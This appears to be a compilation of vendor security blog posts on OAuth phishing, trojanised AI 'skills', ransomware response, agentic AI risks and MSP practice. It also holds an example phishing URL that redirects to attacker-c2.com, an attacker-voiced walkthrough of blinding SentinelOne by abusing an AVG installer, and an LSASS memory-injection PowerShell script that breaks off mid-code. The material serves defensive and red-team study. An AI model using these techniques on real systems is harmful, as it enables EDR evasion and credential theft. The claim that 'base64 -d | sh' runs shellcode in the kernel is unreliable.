How Attackers Weaponize Trusted Identity Endpoints
Threat actors are increasingly exploiting OAuth’s error-handling behavior to route phishing victims through login.microsoftonline.com and accounts.google.com. By crafting URLs that are designed to fail, attackers can silently redirect users to malicious infrastructure.
The “Poison Pill” URL: Attackers use the prompt=none and an invalid scope to force an immediate redirect without the victim seeing a single Microsoft or Google UI element.
Anatomy of a Malicious Authorization Request
GET /common/oauth2/v2.0/authorize ?client_id=<attacker_app_id> &prompt=none &scope=INVALID_SCOPE &response_type=code &redirect_uri=https://attacker-c2.com/phish
Detection & Mitigation Strategies
Monitor for Error 65001: Audit Entra ID sign-in logs for resultType = 65001 involving unknown application IDs.
Restrict User Consent: Disable user-led consent for multi-tenant applications or restrict it to “Verified Publishers” only.
Analyze State Parameters: Inbound emails containing OAuth URLs where the state parameter decodes to a victim’s email address are high-confidence indicators of phishing.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
Forensic Analysis of the AuthTool.exe Name Collision Attack
The “Black Box” Problem: AI Skills are becoming a primary infection vector. Attackers leverage manufactured trust and “name-squatting” to bypass security logic by targeting user common sense.
The Collision: Legitimate vs. Malicious
Legitimate AuthTool
Source: N-able Cove Backup
Status: Documented & Signed
Path:C:\Program Files\...
Malicious AuthTool
Source: Fake “Reddit-Trends” Skill
Status: Unsigned Trojan
Path:C:\Users\[User]\Downloads
The Anatomy of the Attack
The attack follows a classic Trojan horse pattern: wrapping a malicious payload in a high-demand productivity tool (Reddit automation).
AV Evasion: The payload is delivered via a password-protected ZIP (Password: 1234) to blindside automated scanners.
Mac Execution: Uses base64 -d | sh to execute shellcode directly into the kernel.
Social Engineering: Instructions tell the user to “Run AuthTool.exe BEFORE starting the skill,” establishing the binary as a trusted prerequisite.
Conclusion
Thorough forensic profiling of legitimate software remains the best defense. Analysts must verify not just the filename, but the hash, path, and signing authority of every execution event.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
A Guardz Threat Intelligence Case Study | February 2026
On February 19, 2026, the INC Ransomware group launched a high-velocity assault against a managed environment. This report details how autonomous AI outpaced the adversary, ensuring 100% data recovery without human intervention.
1,161
Threat Detections
40ms
Avg. Kill Time
100%
Data Restored
Threat Actor Profile
INC Ransom employs a double-extortion model, focusing on healthcare, government, and MSP sectors. They favor “hands-on-keyboard” tactics over simple automated scripts.
Signature
Detail
Ransom Note
INC-README.txt / .html
Extension
.INC
Recon Tool
Advanced Port Scanner (T1046)
The “18-Minute” Window: In modern attacks, lateral movement occurs in minutes. SentinelOne’s autonomous agent neutralized the reconnaissance phase in just 59 milliseconds, forcing the attacker to operate in the dark.
The Autonomous Advantage
During the mass-deployment wave, the threat actor attempted to infect 36 endpoints simultaneously. SentinelOne’s behavioral engine fired six separate detection rules in under half a second, initiating an immediate Rollback sequence.
Using protected Volume Shadow Copies, the system automatically reverted every impacted file. The result: zero data loss, zero business interruption, and total eviction of the threat actor.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
Agentic AI is reshaping the attack surface by collapsing identity, automation, and execution into a single trusted entity. For SMBs, these tools represent both a leap in productivity and a complex new breach vector.
Critical Insight: Attackers no longer need to exploit system vulnerabilities; they can simply “prompt” or “trick” an agent into abusing its own permissions.
Top 3 Agentic AI Attack Vectors
1. Gateway & Token Hijacking
By manipulating gatewayUrl parameters, attackers can trick an AI agent into sending its local authentication tokens to a malicious WebSocket endpoint, granting the attacker full control over the agent.
2. Rebranding Typosquatting
The naming chaos (e.g., Clawdbot to Moltbot to OpenClaw) allows attackers to register domains like openclawd.ai to harvest API keys from users looking for updates.
3. Poisoned “Skills”
Attackers are uploading malicious skills to community registries. A recent analysis found a trading skill containing a hidden bash loader designed to fetch and execute remote malware silently.
MSP Defense Playbook
Lock Down Permissions: Apply Least Privilege to all AI Service Principals.
Isolate Environments: Sandbox agents to prevent lateral movement.
Skill Verification: Treat all third-party AI “Skills” as executable code and audit them before use.
Kill Switch: Maintain a documented process to instantly revoke all AI-related OAuth tokens.
Defenders are no longer just chasing malware; they must now monitor the intent embedded in autonomous agents acting on behalf of the business.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
The viral adoption of the open-source AI assistant ClawdBot (now Moltbot) has highlighted a critical vulnerability in local-first AI agents: unrestricted system access paired with insecure defaults.
Security Alert: Active infostealer campaigns are currently targeting ClawdBot configuration directories to harvest plaintext API keys and session tokens.
Technical Vulnerabilities
ClawdBot’s primary failure stems from its Gateway API (Port 18789), which allows unauthenticated RCE if bound to public interfaces.
Service
Default Port
Risk
Gateway API
18789
CRITICAL (RCE)
Browser Automation
18791
CRITICAL
Web Dashboard
3000
HIGH
Hardening Checklist
Network: Bind Gateway API strictly to localhost (127.0.0.1).
Auth: Configure a strong token (minimum 32 characters).
Monitoring: Deploy custom EDR rules (SentinelOne STAR) to monitor for zsh sub-processes spawned by the agent.
Permissions: Set config directories to chmod 700.
Strategic Summary
AI agents must be treated as privileged access pathways. Organizations should apply strict data classification policies and zero-trust boundaries to any agentic AI deployment to prevent them from becoming the ultimate Shadow IT liability.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
“MSPs who win in 2026 will use AI as scaffolding, not a shortcut. Content is easy to spin up, but authentic personality is the real competitive edge.”
Paul Green (MSP Marketing Edge) argues that clients don’t buy based on technical specs—they buy based on trust. In 2026, MSPs must replace stock photos with real faces and AI-written articles with genuine client stories.
2. The Identity-First Security Landscape
Elli Shlomo (Guardz) highlights that for the modern SMB, identity is the only real perimeter. As users work from anywhere and rely on SaaS, a single token theft can bypass traditional network security. MSPs must shift focus to login flows and MFA configuration.
3. “Unreasonable Hospitality” in Support
Justin Esgar (Virtua Consulting) predicts that technical excellence is no longer enough. The winners of 2026 will practice “unreasonable hospitality”—knowing a client’s stress points, caring about their team’s milestones, and obsessing over the human experience rather than just the ticket queue.
4. Cyber Insurance and Vendor Hygiene
Chris Johnson (GTIA) notes that cyber insurance claims have skyrocketed. In 2026, MSPs must be more rigorous with their own supply chain. Vendors without ISO 27001 or SOC 2 certifications will be phased out as liability risks become too high to ignore.
5. From MSP-Centric to Customer-Centric
Luis Giraldo (ScalePad) expects a pivot away from “rigid stacks.” Successful MSPs will stop forcing every client into the same box and instead offer flexible solutions mapped directly to unique business outcomes and risk appetites.
6. The Rise of “Industrialized” Cybercrime
Cybercrime is no longer about lone hackers; it’s a professionalized service industry. SMBs are being targeted by automated phishing kits and Ransomware-as-a-Service (RaaS). This shift demands continuous monitoring over simple endpoint protection.
7. Outcomes Over Tooling
Dave Meister (Check Point) warns that the competition is no longer just other MSPs—it’s VARs and telcos trying to bundle “managed” services. Differentiation will come from owning the outcome (e.g., “Zero downtime”) rather than just selling a list of 40 add-on tools.
8. The Decline of AI Code Quality
Matt Lee (Pax8) remains cautious about AI-assisted coding. He warns that as AI-generated code quality potentially declines, security implications will rise, creating “old problems with new vendors.”
9. High-Frequency Content Distribution
Taher Hamid (MSP Camp) believes content is the new currency. To stay on a buyer’s radar, MSPs must become the local “voice of technology” through consistent, insightful content creation across video, social, and email.
10. A New Operating Model
Damien Stevens (Servosity) challenges MSPs to change their mindset. AI isn’t just a new tool; it’s a new operating model. MSPs need to stop hiding in the “IT comfort zone” and start engaging with marketing, sales, and finance leaders to solve business problems.
Navigate 2026 with Guardz
The Guardz unified platform maps all threats to user behavior, providing AI-powered detection and 24/7 MDR. Secure your clients from the inbox to the endpoint and demonstrate real value in 2026.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
Signing a new client marks the beginning of a critical transition. The journey from a signed contract to a profitable, long-term partnership is defined by one process: client onboarding. A well-executed onboarding sets the stage for trust, efficiency, and growth. A poor one leads to misaligned expectations, scope creep, and churn. This five-phase playbook provides a structured framework to ensure every new client relationship starts on the strongest possible foundation.
Phase 1: Discovery and Planning
Goal: To replace assumptions with data and build a tailored service delivery roadmap. The first step is to gain a comprehensive understanding of the client’s environment, challenges, and goals. This is achieved with a mandatory Strategic Onboarding Questionnaire. This document serves as your blueprint for the entire relationship and provides measurable goals for future Quarterly Business Reviews (QBRs).
Key Data Points for Your Questionnaire:
Service Tier & Requirements: Confirm the agreed-upon services, from cloud storage to system monitoring.
Current IT Infrastructure: Document all workstations, servers, and network hardware.
Existing Cybersecurity Stack: List all current tools (endpoint security, firewalls, phishing protection).
Key Personnel & Permissions: Identify roles, access levels, and points of contact.
Third-Party Contracts: Uncover existing agreements with other vendors or service providers.
Incident Response: Review any existing incident response plans.
The insights gathered here allow you to create a customized onboarding plan that aligns with their business objectives from day one.
Phase 2: Security and Risk Assessment
Goal: To establish a security baseline by identifying vulnerabilities and understanding the client’s unique attack surface. Before making any changes, you must understand the client’s current risk posture. A thorough assessment is non-negotiable and demonstrates immediate value. In 2024, over 35% of all breaches were attributed to third parties—a risk many clients are unaware of. Your assessment should uncover these hidden threats.
Essential Security Discovery Checklist:
How are user identities and access permissions managed, reviewed, and revoked?
Are privileged accounts, service accounts, and shared credentials actively monitored?
Is Multi-Factor Authentication (MFA) enforced across all critical accounts?
How is sensitive data classified, protected, and stored?
Do any third parties hold administrative access to cloud services or data?
Are system logs collected and analyzed for anomalies?
Pro Tip: Automate Your Security Assessment Manually auditing a new client’s cloud environment for excessive permissions and third-party risks is time-consuming. A unified security platform like Guardz can automate this discovery process, providing a comprehensive risk report in hours, not days, and identifying threats like suspicious login activity or abnormal data transfers.
Phase 3: Foundation and Expectation Setting
Goal: To build trust and prevent future churn by clearly defining the rules of the partnership. Poor communication and misaligned expectations are leading causes of client churn. A professional Client Welcome Kit is your primary tool for setting the foundation for a successful relationship.
Your Welcome Kit Must Include:
Summary of Services: A clear list of deliverables and project milestones.
Service Level Agreements (SLAs): Defined response times and support escalation paths.
Points of Contact: A directory of your team members and their roles.
Communication Protocols: Official channels for support and inquiries (e.g., email, portal, Slack).
QBR Schedule: Pre-scheduled dates for strategic business reviews.
Resource Hub: Links to FAQs, knowledge bases, and walk-through videos covering topics like IT troubleshooting and phishing awareness.
Phase 4: Technical Integration and Migration
Goal: To execute a flawless migration of user data and systems with zero disruption. This is the most delicate phase of onboarding. Migrating data from multiple sources (CRMs, email, cloud environments) carries significant risk. A single cloud misconfiguration can lead to a data breach.
Best Practices for a Safe Migration:
Create Dummy Data: Never test with live client data. Use dummy datasets to validate workflows, field mappings, and permissions.
Test Extensively: Perform multiple test runs to ensure all integrations function as expected.
Execute Live Import: Only after all tests are successful, proceed with the final live data migration.
Phase 5: The Strategic Kickoff Meeting
Goal: To formally launch the partnership, address final concerns, and solidify rapport with the client’s team. The kickoff meeting is more than a formality; it’s your opportunity to listen. Apply the 80/20 Rule: spend 80% of the time listening to the client’s goals and expectations, and 20% addressing questions and outlining the plan.
Kickoff Meeting Agenda:
Review the detailed onboarding plan and project timelines.
Define roles and responsibilities for both your team and the client’s.
Address any concerns or unique business requirements.
Document all action items and set reminders for follow-up.
Once this meeting concludes, the onboarding process is complete, and the long-term partnership officially begins.
Streamline Your Client Onboarding with Guardz
A secure and efficient onboarding process gives new clients immediate peace of mind. Guardz provides a unified cybersecurity platform that helps MSPs quickly assess risk, detect threats from third-party apps, and monitor cloud accounts for excessive permissions. Start every new client relationship with a foundation of security and trust.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
Most red teamers and attackers don’t walk in through the front door. They dress up as trusted objects and use known security controls.
Here’s the low-level breakdown of the attack leveraging Windows Security Center (WSC). By manipulating WSC’s security product registration and status reporting mechanisms, we deceive Windows into falsely reporting that SentinelOne or Microsoft Defender for Endpoint are inactive or not installed. This effectively blinds the OS and security stack’s telemetry, bypassing the native visibility and control planes and carving out a stealth zone where post-exploitation payloads can execute freely without triggering alerts or defensive actions.
This technique, known in the wild as “Bring Your Own (AV) Installer” (BYOAI), is a refined evolution of the BYOI playbook, engineered for stealth and operational finesse. It swaps noisy, heavy-handed intrusion vectors for a slick, socially engineered injection that co-opts trusted installers, sidestepping typical user-mode defenses.
Enter BYOI correctly, a stealthy tactic that hijacks legitimate AV installers, such as AVG’s signed binaries, to subvert or bypass advanced EDR agents, all without dropping unsigned drivers or relying on kernel exploits. This contrasts sharply with Bring Your Own Vulnerable Driver (BYOVD), which, while powerful, tends to generate detectable noise and is increasingly scrutinized by modern EDR heuristics.
BYOI rides under the system’s radar by leveraging Windows’ native AV provider arbitration mechanisms via the Windows Security Center (WSC). It weaponizes trusted, signed installers and standard Windows MSI install flows to wrest control of the AV provider slot from SentinelOne, effectively ghosting its hooks and telemetry.
In this blog post, we’ll weaponize the AVG Antivirus installer to seize the AV provider position on a Windows 11 host running SentinelOne. Once the hijack completes, SentinelOne’s kernel and user-mode sensors lose visibility, policy enforcement drops off, or the agent enters a dormant mode, depending on its internal configuration and fail-safe logic.
From there, we explore the attacker’s paradise: a freshly carved blind spot inside the OS security stack where post-exploitation payloads can persist, execute, and “live off the land,” all while technically operating within the OS’s own trusted framework, evading detection by flying completely under the radar.
What is BYOI?
Bring Your Own Installer (BYOI) is a post-exploitation technique where attackers cleverly embed malicious activity into the execution flow of a legitimate installer, one that’s already signed, trusted, and often whitelisted by endpoint security solutions.
Instead of slamming down a blatantly anomalous or bespoke binary that would raise a red flag, we tactically leverage the implicit trust built into legitimate, well-known software installers. These installers come equipped with pristine cryptographically verified digital signatures, consistent hashes embedded in vendor-signed catalogs, and established reputational telemetry within reputation-based detection frameworks. This trifecta of trust vectors effectively neutralizes the behavioral and signature-based detection pipelines of AVs and EDRs, allowing adversaries to bypass user-mode monitors by masquerading as system-sanctioned code executing via legitimate MSI installation sequences.
How BYOI Works
How can a potential BYOI work?
Choose a Trusted Installer
The attacker selects an installer commonly found in typical environments, such as AVG Antivirus, Zoom, Slack, or Adobe Reader.
The file is typically digitally signed, making it trusted by the OS, EDR, and even application whitelisting policies.
Wrap or Chain a Malicious Payload
The attacker wraps the installer in a batch script, modifies the install routine, or adds post-install hooks.
The malicious payload (PowerShell, shellcode loader, token stealer, C2 beacon, etc.) is executed during installation or after completion, often with minimal or no user visibility.
Exploit Inherited Trust
Because the parent process is a legitimately signed installer, it causes its child processes, such as powershell.exe and rundll32.exe, to inherit that implicit trust. This inherited trust allows these spawned processes to operate with elevated credibility in the eyes of security telemetry, effectively bypassing behavioral analytics and execution prevention mechanisms that would usually flag or block them.
Security tools designed to suppress alerts during software installations often fail to correlate malicious activity with the threat.
Why It’s So Effective
Low False Positive Zones: Installers often run multiple processes, write to disk, update registry keys, and launch services, exactly what malware does. To avoid false positives, EDRs intentionally suppress noisy detections during these operations. BYOI uses this to blend in.
Signed, Whitelisted, and Familiar: Most orgs allow the execution of well-known installer files (e.g., ZoomInstaller.exe,) and security tools might trust anything signed by a known publisher.
No Exploit Required: There’s no vulnerability involved, just weaponizing user trust and installation workflows. It’s social engineering at the system level.
Fileless Payloads: When combined with PowerShell or LOLBins, BYOI becomes nearly invisible, with no .ps1 on disk, no dropped EXEs, nothing persistent unless intentionally added.
In a nutshell, an attacker takes a trusted sheep costume and hides a dog inside.
🏴☠️ OLD BUT GOLD: Installers Have Always Been the Perfect Cover
While BYOI might sound modern and clever, the truth is that this tactic is nothing new. It’s just evolving with the times.
Back in the day…
Attackers used legit software installers to bundle adware, toolbars, and later… malware. From cracked games on torrent sites to fake Flash Player updates, installers have always been a sneaky delivery mechanism. Why? Because users expect them to make changes, drop files, and run scripts.
Then came EDRs…
As Endpoint Detection & Response systems got smarter, attackers just shifted tactics:
They began wrapping installers with post-install payloads.
During the installation, they started triggering LOLBins (like regsvr32, mshta, or rundll32).
And now, with fileless payloads, the game has leveled up again.
Why does it still work?
Signed binaries = automatic trust
Installer noise = alert suppression
Installer behavior = “normal” on the surface
Low detection threshold = no red flags raised during execution
Some EDR’s in Windows 11
When deploying SentinelOne on a Windows 11 endpoint, it’s essential to verify that the agent is registered correctly with the operating system’s built-in security framework, Windows Security Center (WSC). This ensures there’s no conflict with Microsoft Defender Antivirus and that your endpoint protection is working as expected.
Microsoft Defender for Endpoint (MDE) is deeply integrated into the Windows OS, leveraging native components like Windows Defender Antivirus and security subsystems for seamless protection. MDE’s telemetry and health reporting are tightly coupled with OS event pipelines, offering more accurate and timely status updates in WSC.
Policy enforcement and updates for MDE are managed through native Windows Update channels and Microsoft Endpoint Manager, ensuring the agent stays current automatically. Unlike third-party EDRs, MDE can gracefully coexist with or supersede other agents, optimizing system resources and reducing conflicts within the security stack.
Registered Antivirus Product
SentinelOne Agent is actively registered with the Windows Security Center (WSC).
WMI reports it under the following:
displayName: Sentinel Agent
pathToSignedProductExe: SentinelRemediation.exe
productState: 266240 (this indicates registration and active protection)
What This Means Technically
Windows Defender AV Status:
When SentinelOne registers with WSC as the primary antivirus provider, WindowsDefenderAntivirus automatically enters passive mode.
In this state:
Defender AV is still present on the disk.
It is not actively scanning.
It will not provide real-time protection unless SentinelOne is unregistered or disabled.
This design ensures AV conflicts are avoided. Only one AV provider handles real-time protection at a time.
SentinelOne WSC Registration Behavior
When SentinelOne is installed:
It registers itself in the WMI class AntiVirusProduct via SecurityCenter2.
This disables Defender AV real-time protection to avoid conflicts.
The defender will still be used for certain features like:
Microsoft Defender SmartScreen
Exploit Guard rules
ASR (Attack Surface Reduction) if SentinelOne doesn’t override them
How to View This Status
You can always verify this via PowerShell:
Get CimInstance Namespace root\SecurityCenter2 ClassName AntiVirusProduct
Or view Defender AV’s real-time protection status:
Get MpComputerStatus | Select AMRunningMode, RealTimeProtectionEnabled
If AMRunningMode = Passive, Defender is not providing protection
If RealTimeProtectionEnabled = False, then SentinelOne is active and Defender is passive
What This Tells Us
SentinelOne is active and fully registered as the primary antivirus provider in WSC.
Windows Defender Antivirus is in passive mode, automatically deactivating its real-time protection to prevent conflicts.
productState = 266240 confirms that SentinelOne is both installed and functioning in an active protection state.
The BYOI Attack
Prepare Your Environment
Before launching a BYOI simulation or red team engagement, it’s critical to prepare yourlab or test environment with the right tools, permissions, and security controls. This ensures your simulation is both practical and realistic, especially when trying to evade mature EDR products like SentinelOne.
This guide utilizes AVG’s antivirus installer to execute a fileless PowerShell payload, thereby bypassing detection and operating silently.
Tools
avg_antivirus_free_setup.exe (official installer)
Custom installer_wrapper.bat file
PowerShell payload (fileless user creation for this demo)
Admin access on target (test) machine
Target
Windows 10/11 system
SentinelOne deployed (in detection or EDR mode)
When BYOI Meets Third-Party AV and EDR
The goal is to blend malicious activity with a seemingly benign installation process using a third-party antivirus program, in this case, AVG Free Antivirus.
Why AVG? Its free installer is large, signed, and often trusted by endpoint security tools. By chaining this installer with post-install stealth payloads, we reduce the initial suspicion surface, especially in environments where logs are noisy, or EDRs aren’t aggressive post-install.
Bring Your Own Installer (BYOI) is a classic red team tactic that exploits trust in legitimate software. By chaining a real installer (such as AVG Antivirus) with a post-install payload, attackers can evade EDRs unnoticed, particularly if they rely on reputation, signature matching, or suppressing installer noise.
This initiates the “trusted” activity of the AVG installation.
Kill AVG UI
taskkill /f /im avgui.exe >nul 2>&1
Prevents any post install popups from AVG.
>nul 2>&1: Silently suppresses errors/output.
Some EDRs may only begin active scanning once the UI has fully loaded. Killing it may delay detection windows.
Note: Although there are several ways to silence the installation, I prefer this method.
Key actions
Creates a new hidden local admin user, sys_debug.
Hides the user from the login screen via SpecialAccounts\UserList.
Password never expires.
Uses nop w hidden to avoid PowerShell window pop-ups.
This stealth account persists even if security tools kill the script later.
Detection Evasion Notes
No droppers or additional binaries: The entire payload is inline, making it ideal for evading hash-based detections.
User hiding via registry: A classic trick to evade local user audits.
AVG context: Leveraging trusted installer names and locations gives EDRs second thoughts on alerting.
No network activity: Local privilege escalation without callbacks or C2 connections = low noise.
Windows 11 Version 24H2
We monitored for several hours, expecting an alert or incident to trigger. Despite running AVG.exe along with its child processes and executing additional actions, no detections or alerts were generated.
What Happens When AVG is Installed on a System with SentinelOne or MDE?
When you install AVG Antivirus on a Windows 11 system where SentinelOne or MDE is already registered, here’s what can happen:
Windows Security Center Can Reassign the AV Role
Only one product can be registered with WSC as the primary real-time antivirus provider. If AVG installs itself and registers with WSC, it may replace SentinelOne as the registered AV even if SentinelOne is still running in the background.
SentinelOne May Enter Passive or “Coexist” Mode (Not Ideal)
If AVG takes over:
SentinelOne will still operate but may lose visibility in WSC
Some protection features could be partially disabled or reduced.
Policy enforcement, alerting, or behavioral protection may be disrupted if SentinelOne is not the active AV in WSC
This Breaks Assumptions in Most Security Models
When SentinelOne is your designated AV/EDR:
You expect it to detect and block malware
You rely on it for telemetry, threat remediation, and behavioral AI
But if AVG hijacks the registration, Windows treats it as the primary AV, and:
Defender stays passive
SentinelOne becomes “invisible” to WSC.
You could miss malicious child processes spawned by AVG or its wrapper script.
Kernel-Mode Interaction Is Inevitable When Deploying Third-Party Antivirus on Windows
When you work with a new third-party AV on Windows, there is interaction with the kernel, but indirectly, and depending on what you do:
Driver Installation: Most AV solutions install kernel-mode drivers to provide deep system monitoring, real-time protection, and enforcement. When you install or register a new AV, its kernel drivers get loaded, which directly interact with the OS kernel.
WSC Communication: Windows Security Center (WSC) runs in user mode but communicates with these kernel-mode drivers to get status, health, and configuration info about the AV product.
Configuration Changes: If you change settings via user-mode tools or WSC APIs, these changes eventually propagate down to kernel-mode components for enforcement.
API Calls: Your user-mode processes don’t usually call the kernel directly but interact with drivers via standard Windows driver interfaces (like IOCTLs). The kernel driver handles low-level monitoring and protection.
Summary
The “Bring Your Own (AV) Installer (BYOAI) Evasion: Abusing AV to Slip Past EDR” blog post details a sophisticated technique where attackers leverage legitimate antivirus installers to bypass advanced Endpoint Detection and Response (EDR) solutions.
By exploiting the Windows Security Center’s AV provider arbitration mechanism, adversaries register trusted third-party AV installers, such as AVG, to override or disable active EDR agents, including SentinelOne and Microsoft Defender for Endpoint.
This manipulation blinds the EDR’s telemetry and policy enforcement without requiring kernel exploits or unsigned drivers, enabling stealthy persistence and execution of post-exploitation payloads. The approach capitalizes on inherent trust in signed installers, allowing attackers to operate within Windows’ native security framework and evade detection.
The post also demonstrates how AVG’s installer on Windows 11 can be weaponized to seize the AV provider slot, creating a blind spot where malicious activities can run undetected.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
Attackers are increasingly relying on fileless techniques that operate entirely in memory, thereby evading traditional antivirus software and many legacy controls. As an adversary, the ability to simulate these tactics is crucial for evaluating the steadfast resilience of endpoint security solutions. SentinelOne, known for its behavioral detection capabilities, claims to catch these sophisticated movements. To put that to the test, we are sharing a specific PowerShell script that mimics real-world credential dumping and process injection.
In Guardz, we call it “To Purpleing everything”. The goal is to conduct penetration testing on any component across multiple scenarios and understand how security controls are detected.
Script Description
The script operates exclusively in memory, reflecting the tactics used by modern threat actors. It begins by obtaining a handle on the LSASS process, a prime target for credential harvesting. This step mirrors what tools like Mimikatz attempt when extracting credentials from memory. Next, the script tries to read a segment of LSASS memory. Although no sensitive data is accessed, this action is enough to trigger security analytics focused on process behavior rather than file signatures.
The simulation then escalates by allocating memory within the LSASS process and writing benign data to that space. This mimics the memory manipulation techniques seen in process injection attacks, where malicious code is typically written and executed in the address space of another process. In this case, no code is executed, and nothing ever touches the disk, ensuring the simulation is safe for controlled environments and does not pose a risk of actual compromise.
This approach enables security teams to validate whether their detection tools can identify and respond to genuine attacker tradecraft, not just commodity malware.
The script
function Invoke-LSASSAttackSimulation {
<#
.SYNOPSIS
LSASS memory access + process injection + execution.
.WARNING
Use ONLY in controlled red team labs. Not safe for unauthorized use.
#>
$lsass = Get-Process -Name lsass -ErrorAction SilentlyContinue
if (-not $lsass) {
Write-Output “LSASS process not found.”
return
}
# Define Win32 interop only if not already defined
if (-not (“Win32” -as [type])) {
$sig = @”
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport(“kernel32.dll”, SetLastError = true)]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport(“kernel32.dll”, SetLastError = true)]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, out int lpNumberOfBytesRead);
[DllImport(“kernel32.dll”, SetLastError = true)]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(“kernel32.dll”, SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, out int lpNumberOfBytesWritten);
[DllImport(“kernel32.dll”)]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize,
IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
[DllImport(“kernel32.dll”, SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
}
“@
Add-Type -TypeDefinition $sig
}
$PROCESS_ALL_ACCESS = 0x1F0FFF
$hProcess = [Win32]::OpenProcess($PROCESS_ALL_ACCESS, $false, $lsass.Id)
if ($hProcess -eq [IntPtr]::Zero) {
Write-Output “Failed to open LSASS handle. Run as Administrator?”
return
}
Write-Output “Opened handle to LSASS.”
# Attempt real memory read (for EDR test, junk address)
$buffer = New-Object byte[] 256
